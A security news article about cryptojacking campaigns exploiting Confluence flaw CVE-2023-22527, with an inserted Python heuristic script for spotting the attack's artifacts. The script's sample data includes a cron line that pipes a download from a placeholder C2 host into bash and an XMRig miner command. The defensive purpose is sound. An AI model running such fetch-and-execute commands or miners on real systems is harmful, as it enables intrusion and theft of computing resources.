Threat actors continue to exploit a critical remote code execution (RCE) Atlassian bug discovered in January, with new attack vectors that turn targeted cloud environments into cryptomining networks.
Trend Micro has uncovered two separate attacks that exploit the flaw, tracked as CVE-2023-22527 in Confluence Data Center and Confluence Server, in cryptojacking attacks that drain network resources. The server is for enterprise-level deployments of Atlassian Confluence, a collaboration and documentation platform designed for teams and organizations to create, share, and collaborate on content.
When discovered, the bug received a 10 out of 10 on the Common Vulnerability Scoring System (CVSS), so researchers knew from the outset that it had great potential for exploitation in attacks ranging from ransomware to cyber espionage. Now, cryptojacking can be added to that list, eight months after the flaw's discovery and subsequent patching by Atlassian, according to a blog post published on Aug. 28 by Trend Micro.
"The attacks involve threat actors that employ techniques such as the deployment of shell scripts and XMRig miners, targeting of SSH endpoints, killing competing cryptomining processes, and maintaining persistence via cron jobs," Abdelrahman Esmail, senior engineer of threat research for Trend Micro, wrote in the post.
Trend Micro also discovered thousands of other attempts to exploit max-critical CVE-2023-22527 over the past few months, and thus recommended that those using the server who have not yet patched their environments should do so as quickly as possible.
New Attack Vectors for CVE-2023-22527
By abusing CVE-2023-22527, an unauthenticated attacker can achieve template injection, essentially enabling RCE on the affected instance.
Trend Micro discovered three threat actors using the bug for cryptojacking attacks. However, only two different attack vectors are described in the post. The first one exploited the flaw in a public-facing Confluence Server application for initial access to the environment. Attackers then executed the XMRig miner via an ELF file payload, hijacking system resources in the process.
The second attack vector is far more complicated. It used a shell script to execute miner activity through a shell file over Secure Shell (SSH) for all accessible endpoints in the customer environment, according to Trend Micro. The attackers downloaded the shell file and ran it with bash from memory, then killed all known cryptomining processes and any process being run from */tmp/* directories. Then, they deleted all cron jobs, adding a new one that runs every 5 minutes to check for command-and-control (C2) server communications.
To avoid detection, the attackers also uninstalled security services such as Alibaba Cloud Shield, while blocking the Alibaba Cloud Shield IP address. Before the cryptojacking began later in the attack process, the attacker also turned off other security tools present on the system.
Meanwhile, the adversaries identified the current machine's IP address and gathered data on all possible users, IP addresses, and keys, using the information to target other remote systems via SSH to execute further cryptomining activities, Esmail explained in the post. Once that is done, the attacker launched automated attacks on the targeted other hosts via SSH, and then maintained access to the server through other cron jobs.
"After ensuring that all cloud monitoring and security services are terminated or deleted, the attacker terminates the entry point process that exploits CVE-2023-22527 and downloads the XMRig miner to begin mining activities," Esmail wrote. Once cryptomining begins, the attacker then removed all traces of their activity by clearing logs and bash history.
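The post-exploitation chain described above leaves host-level artifacts that a defender can check for: a high-frequency cron job that pipes a download into a shell, a known miner binary, and processes executing out of temp directories. The following detection heuristics are an added example, not code from the Trend Micro post; the crontab text and process list are constructed sample input, and the hostnames in them are placeholders.

```python
"""Host-audit heuristics for the cryptojacking chain: frequent cron persistence,
XMRig-style miner processes, and binaries executing from /tmp or /dev/shm.
Inputs are plain text (crontab -l output) and a (pid, command) list (ps output)."""
import re

# Constructed sample crontab: one 5-minute persistence job, one benign job.
SAMPLE_CRONTAB = """\
*/5 * * * * curl -fsSL http://c2.placeholder.invalid/update.sh | bash
0 3 * * * /usr/local/bin/logrotate-wrapper
"""

# Constructed sample process list as (pid, command line).
SAMPLE_PROCESSES = [
    (412, "/opt/atlassian/confluence/jre/bin/java -Dconfluence.home=/var/atlassian"),
    (9911, "/tmp/.x/xmrig -o pool.placeholder.invalid:3333 --donate-level 1"),
    (9920, "/bin/bash /tmp/stage2.sh"),
]

# "*/N * * * * <cmd>" style entries: fires every N minutes.
CRON_FREQ_RE = re.compile(r"^\*/([1-9]\d*)\s+\*\s+\*\s+\*\s+\*\s+(.*)$")
# A download piped straight into a shell interpreter.
PIPE_TO_SHELL_RE = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")
# Common XMRig / stratum miner markers on a command line.
MINER_RE = re.compile(r"xmrig|stratum\+tcp|--donate-level", re.IGNORECASE)
# Script or binary run from a world-writable temp location.
TEMP_EXEC_RE = re.compile(r"^(/bin/(ba)?sh\s+)?(/tmp|/dev/shm)/")


def audit_crontab(text):
    """Return findings for cron jobs firing every 10 minutes or less that pipe a download to a shell."""
    findings = []
    for line in text.splitlines():
        match = CRON_FREQ_RE.match(line.strip())
        if not match:
            continue
        minutes, cmd = int(match.group(1)), match.group(2)
        if minutes <= 10 and PIPE_TO_SHELL_RE.search(cmd):
            findings.append(f"cron every {minutes}m pipes download into shell: {cmd}")
    return findings


def audit_processes(procs):
    """Return findings for miner signatures and anything executing out of a temp directory."""
    findings = []
    for pid, cmd in procs:
        if MINER_RE.search(cmd):
            findings.append(f"pid {pid}: miner signature on command line: {cmd}")
        elif TEMP_EXEC_RE.match(cmd):
            findings.append(f"pid {pid}: executing from temp directory: {cmd}")
    return findings


def audit_host(crontab_text, procs):
    """Combine both checks; an empty list means none of the described artifacts were seen."""
    return audit_crontab(crontab_text) + audit_processes(procs)
```

Run against the sample input, the audit flags the 5-minute cron job, the xmrig process and the script launched from /tmp, while the Confluence JVM and the nightly logrotate job pass.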
Further Mitigations Against Atlassian Confluence Attacks
Staying on top of bug patching for software, operating systems, and applications is the best way to prevent such vulnerabilities from being exploited, but Trend Micro also made other suggestions for administrators of cloud environments. These include practicing network segmentation, which can reduce the impact of exploit-based attacks, and conducting regular security audits and vulnerability assessments to help uncover and address weaknesses in infrastructure before exploitation occurs. Beyond that, organizations should have a robust incident response plan in place to ensure a swift and effective response in case of compromise.